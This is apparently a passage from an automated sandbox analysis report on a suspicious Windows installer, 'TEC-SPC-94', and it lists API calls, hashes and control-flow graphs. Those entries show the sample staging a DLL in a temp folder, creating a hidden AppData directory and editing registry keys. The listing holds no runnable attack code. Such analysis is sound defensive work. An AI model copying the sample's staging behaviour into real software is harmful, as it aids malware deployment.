                                                          • Opcode ID: 8fd7ff773941625183321c21c1d438156bd1c93f7609a995d7972b8441070f6c
                                                          • Instruction ID: 22a22a0f5d261001ccd7191b61e6a6ae22ba545f5f0eb33ed6189b5534195358
                                                          • Opcode Fuzzy Hash: 8fd7ff773941625183321c21c1d438156bd1c93f7609a995d7972b8441070f6c
                                                          • Instruction Fuzzy Hash: 3341C071900515BACF11BBB5CC86EAF3679EF06369F20423BF422B10E1C73C8A419A6D

                                                          Control-flow Graph

                                                          [Control-flow graph for the function starting at 004051F2; legend: Executed / Not Executed; node and edge listing omitted]
                                                          APIs
                                                          • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                          • lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                          • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                          • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll), ref: 0040525F
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll
                                                          • API String ID: 2531174081-2218645355
                                                          • Opcode ID: 241caa620ce1fcc58b3a3595d79cd8debb0f013b3e7c164dabd01d0a25878295
                                                          • Instruction ID: 09d17c59ce7287a2cbf3dc662f19c44123261f726eb293d34c68041fb2ac0666
                                                          • Opcode Fuzzy Hash: 241caa620ce1fcc58b3a3595d79cd8debb0f013b3e7c164dabd01d0a25878295
                                                          • Instruction Fuzzy Hash: CA21A131900558BBCB219FA5DD849DFBFB8EF54310F14807AF904B62A0C3798A81CFA8

                                                          Control-flow Graph

                                                          [Control-flow graph for the function starting at 00402573; legend: Executed / Not Executed; node and edge listing omitted]
                                                          APIs
                                                          • ReadFile.KERNELBASE(?,?,?,?), ref: 004025DB
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                          • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                            • Part of subcall function 00405C37: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                          • String ID: 9
                                                          • API String ID: 1149667376-2366072709

                                                          Control-flow Graph

                                                          control_flow_graph 666 4015b9-4015cd call 402b3a call 405a3e 671 401614-401617 666->671 672 4015cf-4015eb call 4059c0 CreateDirectoryW 666->672 674 401646-402197 call 401423 671->674 675 401619-401638 call 401423 call 405f48 SetCurrentDirectoryW 671->675 679 40160a-401612 672->679 680 4015ed-4015f8 GetLastError 672->680 688 402793-40279a 674->688 689 4029c7-4029d6 674->689 675->689 690 40163e-401641 675->690 679->671 679->672 683 401607 680->683 684 4015fa-401605 GetFileAttributesW 680->684 683->679 684->679 684->683 688->689 690->689
                                                          APIs
                                                            • Part of subcall function 00405A3E: CharNextW.USER32(?,?,00424EF0,?,00405AB2,00424EF0,00424EF0,?,?,76232EE0,004057F0,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"), ref: 00405A4C
                                                            • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A51
                                                            • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A69
                                                          • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                          • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,?,00000000,000000F0), ref: 00401630
                                                          Strings
                                                          • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy, xrefs: 00401623
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                          • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy
                                                          • API String ID: 3751793516-3249457974

                                                          Control-flow Graph

                                                          control_flow_graph 693 402b7a-402ba3 RegOpenKeyExW 694 402ba5-402bb0 693->694 695 402c0e-402c12 693->695 696 402bcb-402bdb RegEnumKeyW 694->696 697 402bb2-402bb5 696->697 698 402bdd-402bef RegCloseKey call 4062b2 696->698 699 402c02-402c05 RegCloseKey 697->699 700 402bb7-402bc9 call 402b7a 697->700 706 402bf1-402c00 698->706 707 402c15-402c1b 698->707 704 402c0b-402c0d 699->704 700->696 700->698 704->695 706->695 707->704 708 402c1d-402c2b RegDeleteKeyW 707->708 708->704 709 402c2d 708->709 709->695
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B9B
                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Close$DeleteEnumOpen
                                                          • String ID:
                                                          • API String ID: 1912718029-0

                                                          Control-flow Graph

                                                          control_flow_graph 711 10001759-10001795 call 10001b18 715 100018a6-100018a8 711->715 716 1000179b-1000179f 711->716 717 100017a1-100017a7 call 10002286 716->717 718 100017a8-100017b5 call 100022d0 716->718 717->718 723 100017e5-100017ec 718->723 724 100017b7-100017bc 718->724 725 1000180c-10001810 723->725 726 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 723->726 727 100017d7-100017da 724->727 728 100017be-100017bf 724->728 732 10001812-1000184c call 100015b4 call 100024a9 725->732 733 1000184e-10001854 call 100024a9 725->733 748 10001855-10001859 726->748 727->723 734 100017dc-100017dd call 10002b5f 727->734 730 100017c1-100017c2 728->730 731 100017c7-100017c8 call 100028a4 728->731 736 100017c4-100017c5 730->736 737 100017cf-100017d5 call 10002645 730->737 743 100017cd 731->743 732->748 733->748 746 100017e2 734->746 736->723 736->731 752 100017e4 737->752 743->746 746->752 753 10001896-1000189d 748->753 754 1000185b-10001869 call 1000246c 748->754 752->723 753->715 759 1000189f-100018a0 GlobalFree 753->759 761 10001881-10001888 754->761 762 1000186b-1000186e 754->762 759->715 761->753 764 1000188a-10001895 call 1000153d 761->764 762->761 763 10001870-10001878 762->763 763->761 765 1000187a-1000187b FreeLibrary 763->765 764->753 765->761
                                                          APIs
                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                          • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                          • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                          • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                            • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                            • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                            • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2371509767.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.2371482983.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 00000000.00000002.2371555156.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 00000000.00000002.2371583755.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc$Librarylstrcpy
                                                          • String ID:
                                                          • API String ID: 1791698881-3916222277

                                                          Control-flow Graph

                                                          control_flow_graph 768 405e15-405e47 RegOpenKeyExW 769 405e89-405e8c 768->769 770 405e49-405e68 RegQueryValueExW 768->770 771 405e76 770->771 772 405e6a-405e6e 770->772 774 405e79-405e83 RegCloseKey 771->774 773 405e70-405e74 772->773 772->774 773->771 773->774 774->769
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E3F
                                                          • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E60
                                                          • RegCloseKey.ADVAPI32(?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E83
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: Call
                                                          • API String ID: 3677997916-1824292864

                                                          Control-flow Graph

                                                          control_flow_graph 775 405be3-405bef 776 405bf0-405c24 GetTickCount GetTempFileNameW 775->776 777 405c33-405c35 776->777 778 405c26-405c28 776->778 780 405c2d-405c30 777->780 778->776 779 405c2a 778->779 779->780
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00405C01
                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403358,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405C1C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                          • API String ID: 1716503409-1857211195
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00403192
                                                            • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                          • WriteFile.KERNELBASE(0040BE90,0040F4C3,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                          • SetFilePointer.KERNELBASE(00004D6A,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: File$Pointer$CountTickWrite
                                                          • String ID:
                                                          • API String ID: 2146148272-0
                                                          APIs
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 0040623F
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406253
                                                            • Part of subcall function 004061DC: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406266
                                                          • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00403347
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 4115351271-3512041753
                                                          • Opcode ID: bbd1dcb3637595afbe6b96ae3bcfafd58112e7b3325432cb54e87bfcccc6df60
                                                          • Instruction ID: 64a45b222adfb8bd76fd8b495f2d7cf88aee328212c381153bc1e0c9699f7593
                                                          • Opcode Fuzzy Hash: bbd1dcb3637595afbe6b96ae3bcfafd58112e7b3325432cb54e87bfcccc6df60
                                                          • Instruction Fuzzy Hash: 22D0C92251AA3135C551372A7D06FCF295C8F0A329F12A477F809B90C2CB7C2A8249FE
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                          • WriteFile.KERNELBASE(00000000,00413E90,?,000000FF,00000000,00413E90,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: File$PointerWrite
                                                          • String ID:
                                                          • API String ID: 539440098-0
                                                          • Opcode ID: 90118ecf7a9ba7c1b0c512c54543666c71b076bc3a218e086344a49311413f62
                                                          • Instruction ID: e0bff1d0cfda9ca41153e72f66d50dbc15cd376e58f7be5246e1248deba32b17
                                                          • Opcode Fuzzy Hash: 90118ecf7a9ba7c1b0c512c54543666c71b076bc3a218e086344a49311413f62
                                                          • Instruction Fuzzy Hash: A2315971504218EBDF20CF65ED45A9F3FB8EB08755F20807AF904EA1A0D3349E40DBA9
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FC3
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                                          • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 334405425-0
                                                          • Opcode ID: a8461a16ac82fd46328c3b40fe1928024aef525999e2dd49edf51c7c032d1790
                                                          • Instruction ID: 409458e37c45ac75b59f5eb787cb01d488d5b476e6d1706a1798d0305ac83909
                                                          • Opcode Fuzzy Hash: a8461a16ac82fd46328c3b40fe1928024aef525999e2dd49edf51c7c032d1790
                                                          • Instruction Fuzzy Hash: A221C571904215F6CF206FA5CE48ADEBAB4AB04358F70427BF610B51E0D7B98E41DA6E
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2371509767.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.2371482983.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 00000000.00000002.2371555156.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 00000000.00000002.2371583755.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: EnumErrorLastWindows
                                                          • String ID:
                                                          • API String ID: 14984897-0
                                                          APIs
                                                            • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                          • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsrF34D.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          APIs
                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          APIs
                                                            • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F4
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 004022FD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CloseDeleteOpenValue
                                                          • String ID:
                                                          • API String ID: 849931509-0
                                                          APIs
                                                          • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmp
